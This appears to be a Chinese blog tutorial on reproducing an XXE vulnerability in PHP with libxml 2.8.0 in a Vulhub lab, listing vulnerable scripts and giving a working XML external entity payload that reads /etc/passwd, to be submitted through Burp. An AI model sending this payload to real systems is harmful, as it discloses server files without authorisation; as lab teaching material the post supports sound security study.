PHP环境 XML外部实体注入漏洞(XXE)
发布于 2021-05-12 23:22 ,所属分类:区块连和PHP开发学习资料
点击进入“php从入门到精通”
领取免费资料
利用vulhub搭建环境(Vulhub是一个面向大众的开源漏洞靶场)
漏洞版本:
- PHP 7.0.30
- libxml 2.8.0
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。
编译并启动环境
访问 http://xxx.xxx.xxx.xxx:8080进入主页看到phpinfo,查看libxml版本是否为2.9.0以下。
目录下有dom.php、index.php、SimpleXMLElement.php、simplexml_load_string.php其中dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞。
XXE payload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
burp抓包进行更改
相关资源